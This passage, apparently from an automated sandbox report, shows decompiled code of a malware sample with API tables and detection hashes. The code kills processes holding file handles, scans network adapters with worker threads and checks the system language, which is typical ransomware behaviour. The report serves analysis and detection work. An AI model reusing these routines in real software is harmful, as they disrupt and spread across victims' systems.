				void* _t33;
				long _t34;
				intOrPtr* _t35;

				_v8 = 0;
				_v12 = CreateFileW(L"NUL", 0x80000000, 0, 0, 3, 0, 0);
				if(_v12 != 0xffffffff) {
					_v20 = 0x400;
					_v16 = RtlAllocateHeap( *0xcf0a9e, 0, _v20);
					while(1) {
						_t27 = NtQuerySystemInformation(0x10, _v16, _v20,  &_v20);
						if(_t27 == 0) {
							break;
						}
						if(_t27 == 0xc0000004) {
							_v16 = RtlReAllocateHeap( *0xcf0a9e, 0, _v16, _v20);
							continue;
						}
						goto L13;
					}
					_t33 = _v12;
					_t29 = GetCurrentProcessId();
					_t34 = _t29;
					_t35 = _v16;
					asm("lodsd");
					_t32 = _t29;
					while( *_t35 != _t34 ||  *((intOrPtr*)(_t35 + 6)) != _t33) {
						_t35 = _t35 + 0x10;
						_t32 = _t32 - 1;
						if(_t32 != 0) {
							continue;
						}
						L12:
						RtlFreeHeap( *0xcf0a9e, 0, _v16);
						goto L13;
					}
					_v8 =  *(_t35 + 4) & 0x000000ff;
					goto L12;
				}
				L13:
				if(_v12 != 0xffffffff) {
					CloseHandle(_v12);
				}
				return _v8;
			}

0x00ce5704
0x00ce5725
0x00ce572c
0x00ce5732
0x00ce574a
0x00ce574d
0x00ce5759
0x00ce5761
0x00000000
0x00000000
0x00ce576c
0x00ce5782
0x00000000
0x00ce5782
0x00000000
0x00ce576c
0x00ce578d
0x00ce5790
0x00ce5796
0x00ce5798
0x00ce579b
0x00ce579c
0x00ce579e
0x00ce57b1
0x00ce57b4
0x00ce57b7
0x00000000
0x00000000
0x00ce57b9
0x00ce57c4
0x00000000
0x00ce57c4
0x00ce57ac
0x00000000
0x00ce57ac
0x00ce57ca
0x00ce57ce
0x00ce57d3
0x00ce57d3
0x00ce57e4

APIs

CreateFileW.KERNEL32(NUL,80000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,?), ref: 00CE571F
RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00CE5744
NtQuerySystemInformation.NTDLL(00000010,?,00000400,00000400), ref: 00CE5759
RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 00CE577C
GetCurrentProcessId.KERNEL32(?,?,?), ref: 00CE5790
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE57C4
CloseHandle.KERNEL32(000000FF,?,?,?), ref: 00CE57D3

Strings

NUL, xrefs: 00CE571A

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Allocate$CloseCreateCurrentFileFreeHandleInformationProcessQuerySystem
String ID: NUL
API String ID: 419024613-1038343538
Opcode ID: 96174cd69ce01b89276e59423f3ca61f6649f255456c6ed556f43e70151caa16
Instruction ID: 5a434db40575e0287a290f6865167f8e7b33b165c064e2335b580ea1306b480a
Opcode Fuzzy Hash: 96174cd69ce01b89276e59423f3ca61f6649f255456c6ed556f43e70151caa16
Instruction Fuzzy Hash: FC21DE31A00709FFDB209FD2DC48BBDBBB1EB08B14F304569E621A21A1E3712A60DB05

Uniqueness

Uniqueness Score: -1.00%

Function 00CE585D, Relevance: 7.6, APIs: 5, Instructions: 61
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CE585D(void* __ebx) {
				long _t50;
				void* _t54;
				long _t55;
				wchar_t* _t69;
				wchar_t* _t77;
				void* _t78;
				signed int _t79;
				void* _t86;
				wchar_t* _t89;
				long* _t90;
				intOrPtr _t92;
				void* _t97;
				wchar_t* _t99;
				long* _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_t86 = __ebx;
				while(1) {
					_t50 = NtQuerySystemInformation(0x10,  *(_t103 - 0x10),  *(_t103 - 0x14), _t103 - 0x14);
					if(_t50 == 0) {
						break;
					}
					if(_t50 != 0xc0000004) {
						RtlFreeHeap( *0xcf0a9e, 0,  *(_t103 - 0x10));
						return  *((intOrPtr*)(_t103 - 4));
					} else {
						 *(_t103 - 0x10) = RtlReAllocateHeap( *0xcf0a9e, 0,  *(_t103 - 0x10),  *(_t103 - 0x14));
						continue;
					}
					L34:
				}
				_t54 = RtlAllocateHeap( *0xcf0a9e, 8, 0x10000);
				 *(_t103 - 0x24) = _t54;
				_t101 =  *(_t103 - 0x10);
				asm("lodsd");
				_t97 = _t54;
				 *(_t103 - 0x18) = 0;
				do {
					_t92 =  *((intOrPtr*)(_t103 - 0x1c));
					_t55 =  *(_t103 - 0x18);
					if(_t101[1] != _t86 ||  *_t101 <= 4 ||  *_t101 == _t55 ||  *_t101 == _t92) {
						goto L31;
					} else {
						 *(_t103 - 8) = OpenProcess(0x100441, 0,  *_t101);
						if( *(_t103 - 8) != 0) {
							if(DuplicateHandle( *(_t103 - 8), _t101[1] & 0x0000ffff, 0xffffffff, _t103 - 0xc, 0, 0, 2) != 0) {
								if(E00CE5675( *(_t103 - 0xc),  *(_t103 - 0x24)) != 0) {
									E00CE13DA(_t63,  *(_t103 - 0x24), 0x10000);
									goto L29;
								} else {
									_t69 = wcsrchr( *(_t103 - 0x24) + 4, 0x5c);
									_t106 = _t106 + 8;
									if(_t69 == 0) {
										L27:
										E00CE13DA(_t69,  *(_t103 - 0x24), 0x10000);
										L29:
										CloseHandle( *(_t103 - 0xc));
										goto L30;
									} else {
										_t69 =  *0xcf0cd6(_t69,  *((intOrPtr*)(_t103 - 0x20)));
										_t106 = _t106 + 8;
										if(_t69 != 0) {
											goto L27;
										} else {
											 *(_t103 - 0x28) = RtlAllocateHeap( *0xcf0a9e, 8, 0x10000);
											if(NtQueryInformationProcess( *(_t103 - 8), 0x1b,  *(_t103 - 0x28), 0x10000, _t103 - 0x14) == 0) {
												_t77 = wcsrchr( *( *(_t103 - 0x28) + 4), 0x5c);
												_t109 = _t106 + 8;
												_t89 = _t77;
												if(_t89 != 0) {
													_t90 =  &(_t89[0]);
													_t99 =  *0xcf090c; // 0x7aea38
													while(1) {
														_t78 =  *0xcf0cd6(_t99, _t90);
														_t110 = _t109 + 8;
														if(_t78 == 0) {
															break;
														}
														_t79 = wcslen(_t99);
														_t109 = _t110 + 4;
														_t99 = _t99 + 2 + _t79 * 2;
														if( *_t99 != 0) {
															continue;
														} else {
															CloseHandle( *(_t103 - 0xc));
															TerminateProcess( *(_t103 - 8), 0);
															WaitForSingleObject( *(_t103 - 8), 0xffffffff);
															CloseHandle( *(_t103 - 8));
															 *((intOrPtr*)(_t103 - 4)) = 1;
														}
														goto L26;
													}
												}
											}
											L26:
											RtlFreeHeap( *0xcf0a9e, 0,  *(_t103 - 0x28));
										}
									}
								}
							} else {
								 *(_t103 - 0x18) =  *_t101;
								L30:
								CloseHandle( *(_t103 - 8));
								goto L31;
							}
						} else {
							 *(_t103 - 0x18) =  *_t101;
							goto L31;
						}
					}
					break;
					L31:
					_t101 =  &(_t101[4]);
					_t97 = _t97 - 1;
				} while (_t97 != 0);
				RtlFreeHeap( *0xcf0a9e, 0,  *(_t103 - 0x24));
				RtlFreeHeap( *0xcf0a9e, 0,  *(_t103 - 0x10));
				return  *((intOrPtr*)(_t103 - 4));
				goto L34;
			}

0x00ce585d
0x00ce5845
0x00ce5851
0x00ce5859
0x00000000
0x00000000
0x00ce5864
0x00ce588c
0x00ce589d
0x00ce5866
0x00ce587a
0x00000000
0x00ce587a
0x00000000
0x00ce5864
0x00ce58af
0x00ce58b5
0x00ce58b8
0x00ce58bb
0x00ce58bc
0x00ce58be
0x00ce58c5
0x00ce58c5
0x00ce58c8
0x00ce58ce
0x00000000
0x00ce58ed
0x00ce58fc
0x00ce5903
0x00ce592b
0x00ce5944
0x00ce5a49
0x00000000
0x00ce594a
0x00ce5953
0x00ce5959
0x00ce595e
0x00ce5a32
0x00ce5a3a
0x00ce5a4e
0x00ce5a51
0x00000000
0x00ce5964
0x00ce5968
0x00ce596e
0x00ce5973
0x00000000
0x00ce5979
0x00ce598c
0x00ce59a8
0x00ce59b3
0x00ce59b9
0x00ce59bc
0x00ce59c0
0x00ce59c2
0x00ce59c5
0x00ce59cb
0x00ce59cd
0x00ce59d3
0x00ce59d8
0x00000000
0x00000000
0x00ce59dd
0x00ce59e3
0x00ce59e6
0x00ce59ee
0x00000000
0x00ce59f0
0x00ce59f3
0x00ce59fe
0x00ce5a09
0x00ce5a12
0x00ce5a18
0x00ce5a18
0x00000000
0x00ce59ee
0x00ce59da
0x00ce59c0
0x00ce5a1f
0x00ce5a2a
0x00ce5a2a
0x00ce5973
0x00ce595e
0x00ce592d
0x00ce592f
0x00ce5a57
0x00ce5a5a
0x00000000
0x00ce5a5a
0x00ce5905
0x00ce5907
0x00000000
0x00ce5907
0x00ce5903
0x00000000
0x00ce5a60
0x00ce5a60
0x00ce5a63
0x00ce5a64
0x00ce5a77
0x00ce5a88
0x00ce5a99
0x00000000

APIs

NtQuerySystemInformation.NTDLL(00000010,000000FF,00000400,00000400), ref: 00CE5851
RtlReAllocateHeap.NTDLL(00000000,000000FF,00000400), ref: 00CE5874
RtlAllocateHeap.NTDLL(00000008,00010000), ref: 00CE58AF
OpenProcess.KERNEL32(00100441,00000000,000000FF,?,?), ref: 00CE58F6
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5A77
RtlFreeHeap.NTDLL(00000000,000000FF), ref: 00CE5A88

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateFree$InformationOpenProcessQuerySystem
String ID:
API String ID: 231150233-0
Opcode ID: 0415a4c23848cfb5d804da4fcb5ec1ef03ae5dc9060fc7136ad81cdb16db43bb
Instruction ID: 494e8e8bb68ef992c6504b0674ad585ebaf3264402168a05c4c5a57273ee2561
Opcode Fuzzy Hash: 0415a4c23848cfb5d804da4fcb5ec1ef03ae5dc9060fc7136ad81cdb16db43bb
Instruction Fuzzy Hash: C0219635A40649DFDF21DF92DC44BBDBBB1FF08705F34042AE552A21A1D7721A80EB12

Uniqueness

Uniqueness Score: -1.00%

Function 00CE587F, Relevance: 7.6, APIs: 5, Instructions: 61
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CE587F(void* __ebx) {
				long _t50;
				void* _t54;
				long _t55;
				wchar_t* _t69;
				wchar_t* _t77;
				void* _t78;
				signed int _t79;
				void* _t86;
				wchar_t* _t89;
				long* _t90;
				intOrPtr _t92;
				void* _t97;
				wchar_t* _t99;
				long* _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_t86 = __ebx;
				while(1) {
					_t50 = NtQuerySystemInformation(0x10,  *(_t103 - 0x10),  *(_t103 - 0x14), _t103 - 0x14);
					if(_t50 == 0) {
						break;
					}
					if(_t50 != 0xc0000004) {
						RtlFreeHeap( *0xcf0a9e, 0,  *(_t103 - 0x10));
						return  *((intOrPtr*)(_t103 - 4));
					} else {
						 *(_t103 - 0x10) = RtlReAllocateHeap( *0xcf0a9e, 0,  *(_t103 - 0x10),  *(_t103 - 0x14));
						continue;
					}
					L34:
				}
				_t54 = RtlAllocateHeap( *0xcf0a9e, 8, 0x10000);
				 *(_t103 - 0x24) = _t54;
				_t101 =  *(_t103 - 0x10);
				asm("lodsd");
				_t97 = _t54;
				 *(_t103 - 0x18) = 0;
				do {
					_t92 =  *((intOrPtr*)(_t103 - 0x1c));
					_t55 =  *(_t103 - 0x18);
					if(_t101[1] != _t86 ||  *_t101 <= 4 ||  *_t101 == _t55 ||  *_t101 == _t92) {
						goto L31;
					} else {
						 *(_t103 - 8) = OpenProcess(0x100441, 0,  *_t101);
						if( *(_t103 - 8) != 0) {
							if(DuplicateHandle( *(_t103 - 8), _t101[1] & 0x0000ffff, 0xffffffff, _t103 - 0xc, 0, 0, 2) != 0) {
								if(E00CE5675( *(_t103 - 0xc),  *(_t103 - 0x24)) != 0) {
									E00CE13DA(_t63,  *(_t103 - 0x24), 0x10000);
									goto L29;
								} else {
									_t69 = wcsrchr( *(_t103 - 0x24) + 4, 0x5c);
									_t106 = _t106 + 8;
									if(_t69 == 0) {
										L27:
										E00CE13DA(_t69,  *(_t103 - 0x24), 0x10000);
										L29:
										CloseHandle( *(_t103 - 0xc));
										goto L30;
									} else {
										_t69 =  *0xcf0cd6(_t69,  *((intOrPtr*)(_t103 - 0x20)));
										_t106 = _t106 + 8;
										if(_t69 != 0) {
											goto L27;
										} else {
											 *(_t103 - 0x28) = RtlAllocateHeap( *0xcf0a9e, 8, 0x10000);
											if(NtQueryInformationProcess( *(_t103 - 8), 0x1b,  *(_t103 - 0x28), 0x10000, _t103 - 0x14) == 0) {
												_t77 = wcsrchr( *( *(_t103 - 0x28) + 4), 0x5c);
												_t109 = _t106 + 8;
												_t89 = _t77;
												if(_t89 != 0) {
													_t90 =  &(_t89[0]);
													_t99 =  *0xcf090c; // 0x7aea38
													while(1) {
														_t78 =  *0xcf0cd6(_t99, _t90);
														_t110 = _t109 + 8;
														if(_t78 == 0) {
															break;
														}
														_t79 = wcslen(_t99);
														_t109 = _t110 + 4;
														_t99 = _t99 + 2 + _t79 * 2;
														if( *_t99 != 0) {
															continue;
														} else {
															CloseHandle( *(_t103 - 0xc));
															TerminateProcess( *(_t103 - 8), 0);
															WaitForSingleObject( *(_t103 - 8), 0xffffffff);
															CloseHandle( *(_t103 - 8));
															 *((intOrPtr*)(_t103 - 4)) = 1;
														}
														goto L26;
													}
												}
											}
											L26:
											RtlFreeHeap( *0xcf0a9e, 0,  *(_t103 - 0x28));
										}
									}
								}
							} else {
								 *(_t103 - 0x18) =  *_t101;
								L30:
								CloseHandle( *(_t103 - 8));
								goto L31;
							}
						} else {
							 *(_t103 - 0x18) =  *_t101;
							goto L31;
						}
					}
					break;
					L31:
					_t101 =  &(_t101[4]);
					_t97 = _t97 - 1;
				} while (_t97 != 0);
				RtlFreeHeap( *0xcf0a9e, 0,  *(_t103 - 0x24));
				RtlFreeHeap( *0xcf0a9e, 0,  *(_t103 - 0x10));
				return  *((intOrPtr*)(_t103 - 4));
				goto L34;
			}

0x00ce587f
0x00ce5845
0x00ce5851
0x00ce5859
0x00000000
0x00000000
0x00ce5864
0x00ce588c
0x00ce589d
0x00ce5866
0x00ce587a
0x00000000
0x00ce587a
0x00000000
0x00ce5864
0x00ce58af
0x00ce58b5
0x00ce58b8
0x00ce58bb
0x00ce58bc
0x00ce58be
0x00ce58c5
0x00ce58c5
0x00ce58c8
0x00ce58ce
0x00000000
0x00ce58ed
0x00ce58fc
0x00ce5903
0x00ce592b
0x00ce5944
0x00ce5a49
0x00000000
0x00ce594a
0x00ce5953
0x00ce5959
0x00ce595e
0x00ce5a32
0x00ce5a3a
0x00ce5a4e
0x00ce5a51
0x00000000
0x00ce5964
0x00ce5968
0x00ce596e
0x00ce5973
0x00000000
0x00ce5979
0x00ce598c
0x00ce59a8
0x00ce59b3
0x00ce59b9
0x00ce59bc
0x00ce59c0
0x00ce59c2
0x00ce59c5
0x00ce59cb
0x00ce59cd
0x00ce59d3
0x00ce59d8
0x00000000
0x00000000
0x00ce59dd
0x00ce59e3
0x00ce59e6
0x00ce59ee
0x00000000
0x00ce59f0
0x00ce59f3
0x00ce59fe
0x00ce5a09
0x00ce5a12
0x00ce5a18
0x00ce5a18
0x00000000
0x00ce59ee
0x00ce59da
0x00ce59c0
0x00ce5a1f
0x00ce5a2a
0x00ce5a2a
0x00ce5973
0x00ce595e
0x00ce592d
0x00ce592f
0x00ce5a57
0x00ce5a5a
0x00000000
0x00ce5a5a
0x00ce5905
0x00ce5907
0x00000000
0x00ce5907
0x00ce5903
0x00000000
0x00ce5a60
0x00ce5a60
0x00ce5a63
0x00ce5a64
0x00ce5a77
0x00ce5a88
0x00ce5a99
0x00000000

APIs

NtQuerySystemInformation.NTDLL(00000010,000000FF,00000400,00000400), ref: 00CE5851
RtlReAllocateHeap.NTDLL(00000000,000000FF,00000400), ref: 00CE5874
RtlAllocateHeap.NTDLL(00000008,00010000), ref: 00CE58AF
OpenProcess.KERNEL32(00100441,00000000,000000FF,?,?), ref: 00CE58F6
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5A77
RtlFreeHeap.NTDLL(00000000,000000FF), ref: 00CE5A88

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateFree$InformationOpenProcessQuerySystem
String ID:
API String ID: 231150233-0
Opcode ID: e0a73cc1281676627e5affe561782196da7eb4fe67c79ca795984fb5b4605b44
Instruction ID: 494e8e8bb68ef992c6504b0674ad585ebaf3264402168a05c4c5a57273ee2561
Opcode Fuzzy Hash: e0a73cc1281676627e5affe561782196da7eb4fe67c79ca795984fb5b4605b44
Instruction Fuzzy Hash: C0219635A40649DFDF21DF92DC44BBDBBB1FF08705F34042AE552A21A1D7721A80EB12

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6F46, Relevance: 7.6, APIs: 5, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00CE6F46(intOrPtr _a4) {
				void* _v8;
				long _v12;
				long _v16;
				intOrPtr* _t25;
				intOrPtr _t26;

				_v16 = 0;
				_t26 = _a4;
				 *0xcf0ee6(0,  &_v12);
				_v8 = RtlAllocateHeap( *0xcf0a9e, 0, _v12);
				if(_v8 != 0) {
					_push( &_v12);
					_push(_v8);
					if( *0xcf0ee6() == 0) {
						_t25 = _v8;
						do {
							_t10 = _t25 + 0x1b0; // 0x1b0
							if( *0xcf0f5e() != 0) {
								_v16 = _v16 + E00CE6FD5(_t26, _t23);
							}
							_t25 =  *_t25;
						} while (_t25 != 0);
					}
					RtlFreeHeap( *0xcf0a9e, 0, _v8);
				}
				return _v16;
			}

0x00ce6f51
0x00ce6f58
0x00ce6f61
0x00ce6f78
0x00ce6f7f
0x00ce6f84
0x00ce6f85
0x00ce6f90
0x00ce6f92
0x00ce6f95
0x00ce6f95
0x00ce6fa4
0x00ce6fad
0x00ce6fad
0x00ce6fb0
0x00ce6fb2
0x00ce6f95
0x00ce6fc1
0x00ce6fc1
0x00ce6fd2

APIs

GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00CE6F61
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CE6F72
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00CE6F88
inet_addr.WS2_32(000001B0), ref: 00CE6F9C

Part of subcall function 00CE6FD5: CreateThread.KERNEL32(00000000,00000000,00CE70DD,?,00000000,00000000), ref: 00CE7023
Part of subcall function 00CE6FD5: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,?,?,?,00000000), ref: 00CE703C
Part of subcall function 00CE6FD5: WaitForMultipleObjects.KERNEL32(00000040,00CED4DD,00000001,000000FF,?,?,?,00000000), ref: 00CE704F
Part of subcall function 00CE6FD5: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,00CF1048,00000400,?,?,?,00000000), ref: 00CE7073
Part of subcall function 00CE6FD5: WaitForMultipleObjects.KERNEL32(00000040,00CED4DD,00000001,000000FF,?,?,?,00000000), ref: 00CE708E

RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE6FC1

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: MultipleObjectsWait$AdaptersHeapInfo$AllocateCreateFreeThreadinet_addr
String ID:
API String ID: 3717838598-0
Opcode ID: e34947e86d9ae699b6354fdf512cdcfdd8812bf9b883052c94d276a87532a5d3
Instruction ID: 06df6a557508c116bfe04ba2a9d883b2cdc286722294b0e46e7b09b68097a4b6
Opcode Fuzzy Hash: e34947e86d9ae699b6354fdf512cdcfdd8812bf9b883052c94d276a87532a5d3
Instruction Fuzzy Hash: B4118E71A00208FFEB00DFD2EC88BFEBB79EB14755F200065F904961A1E7316A04DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5787, Relevance: 6.0, APIs: 4, Instructions: 41
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CE5787() {
				long _t17;
				long _t21;
				long _t25;
				void* _t27;
				long _t30;
				void* _t32;
				void* _t33;

				while(1) {
					_t17 = NtQuerySystemInformation(0x10,  *(_t33 - 0xc),  *(_t33 - 0x10), _t33 - 0x10);
					if(_t17 == 0) {
						break;
					}
					if(_t17 == 0xc0000004) {
						 *(_t33 - 0xc) = RtlReAllocateHeap( *0xcf0a9e, 0,  *(_t33 - 0xc),  *(_t33 - 0x10));
						continue;
					}
					L13:
					if( *(_t33 - 8) != 0xffffffff) {
						CloseHandle( *(_t33 - 8));
					}
					return  *(_t33 - 4);
				}
				_t27 =  *(_t33 - 8);
				_t21 = GetCurrentProcessId();
				_t30 = _t21;
				_t32 =  *(_t33 - 0xc);
				asm("lodsd");
				_t25 = _t21;
				while( *_t32 != _t30 ||  *((intOrPtr*)(_t32 + 6)) != _t27) {
					_t32 = _t32 + 0x10;
					_t25 = _t25 - 1;
					if(_t25 != 0) {
						continue;
					}
					L12:
					RtlFreeHeap( *0xcf0a9e, 0,  *(_t33 - 0xc));
					goto L13;
				}
				 *(_t33 - 4) =  *(_t32 + 4) & 0x000000ff;
				goto L12;
			}

0x00ce574d
0x00ce5759
0x00ce5761
0x00000000
0x00000000
0x00ce576c
0x00ce5782
0x00000000
0x00ce5782
0x00ce57ca
0x00ce57ce
0x00ce57d3
0x00ce57d3
0x00ce57e4
0x00ce57e4
0x00ce578d
0x00ce5790
0x00ce5796
0x00ce5798
0x00ce579b
0x00ce579c
0x00ce579e
0x00ce57b1
0x00ce57b4
0x00ce57b7
0x00000000
0x00000000
0x00ce57b9
0x00ce57c4
0x00000000
0x00ce57c4
0x00ce57ac
0x00000000

APIs

NtQuerySystemInformation.NTDLL(00000010,?,00000400,00000400), ref: 00CE5759
RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 00CE577C
GetCurrentProcessId.KERNEL32(?,?,?), ref: 00CE5790
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE57C4
CloseHandle.KERNEL32(000000FF,?,?,?), ref: 00CE57D3

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateCloseCurrentFreeHandleInformationProcessQuerySystem
String ID:
API String ID: 3072116263-0
Opcode ID: d1d5991c870e7884e9c4d5f862b731bca59598f566da998c3f8420dcccddd7d5
Instruction ID: fcd079f17badfd465c11f03550d5277293d53c631056d8ca7c0a69efa7aec11a
Opcode Fuzzy Hash: d1d5991c870e7884e9c4d5f862b731bca59598f566da998c3f8420dcccddd7d5
Instruction Fuzzy Hash: 5E018B36A04A48EFCF109FD2DC447BDBBB2EB04329F304466E566A21A1E3311E60EB01

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5765, Relevance: 6.0, APIs: 4, Instructions: 41
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CE5765() {
				long _t17;
				long _t21;
				long _t25;
				void* _t27;
				long _t30;
				void* _t32;
				void* _t33;

				while(1) {
					_t17 = NtQuerySystemInformation(0x10,  *(_t33 - 0xc),  *(_t33 - 0x10), _t33 - 0x10);
					if(_t17 == 0) {
						break;
					}
					if(_t17 == 0xc0000004) {
						 *(_t33 - 0xc) = RtlReAllocateHeap( *0xcf0a9e, 0,  *(_t33 - 0xc),  *(_t33 - 0x10));
						continue;
					}
					L13:
					if( *(_t33 - 8) != 0xffffffff) {
						CloseHandle( *(_t33 - 8));
					}
					return  *(_t33 - 4);
				}
				_t27 =  *(_t33 - 8);
				_t21 = GetCurrentProcessId();
				_t30 = _t21;
				_t32 =  *(_t33 - 0xc);
				asm("lodsd");
				_t25 = _t21;
				while( *_t32 != _t30 ||  *((intOrPtr*)(_t32 + 6)) != _t27) {
					_t32 = _t32 + 0x10;
					_t25 = _t25 - 1;
					if(_t25 != 0) {
						continue;
					}
					L12:
					RtlFreeHeap( *0xcf0a9e, 0,  *(_t33 - 0xc));
					goto L13;
				}
				 *(_t33 - 4) =  *(_t32 + 4) & 0x000000ff;
				goto L12;
			}

APIs

NtQuerySystemInformation.NTDLL(00000010,?,00000400,00000400), ref: 00CE5759
RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 00CE577C
GetCurrentProcessId.KERNEL32(?,?,?), ref: 00CE5790
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE57C4
CloseHandle.KERNEL32(000000FF,?,?,?), ref: 00CE57D3

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateCloseCurrentFreeHandleInformationProcessQuerySystem
String ID:
API String ID: 3072116263-0
Opcode ID: acd6fa18db02f90661ce02d69d041c16d1f69d53c0dba6af6743e3b5fc16c4e3
Instruction ID: fcd079f17badfd465c11f03550d5277293d53c631056d8ca7c0a69efa7aec11a
Opcode Fuzzy Hash: acd6fa18db02f90661ce02d69d041c16d1f69d53c0dba6af6743e3b5fc16c4e3
Instruction Fuzzy Hash: 5E018B36A04A48EFCF109FD2DC447BDBBB2EB04329F304466E566A21A1E3311E60EB01

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4819, Relevance: 3.1, APIs: 2, Instructions: 119
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E00CE4819() {
				short _t28;
				void* _t29;

				_t29 =  *0xcf0d92();
				_t28 = GetUserDefaultLangID();
				if(0xbadba4 == _t29 || 0xbadba4 == _t28) {
					goto L52;
				} else {
					if(0xbadb9f == _t29 || 0xbadb9f == _t28) {
						goto L52;
					} else {
						if(0xbadba0 == _t29 || 0xbadba0 == _t28) {
							goto L52;
						} else {
							if(0xbadbab == _t29 || 0xbadbab == _t28) {
								goto L52;
							} else {
								if(0xbadba8 == _t29 || 0xbadba8 == _t28) {
									goto L52;
								} else {
									if(0xbadba9 == _t29 || 0xbadba9 == _t28) {
										goto L52;
									} else {
										if(0xbadbb2 == _t29 || 0xbadbb2 == _t28) {
											goto L52;
										} else {
											if(0xbadbba == _t29 || 0xbadbba == _t28) {
												goto L52;
											} else {
												if(0xbadbbb == _t29 || 0xbadbbb == _t28) {
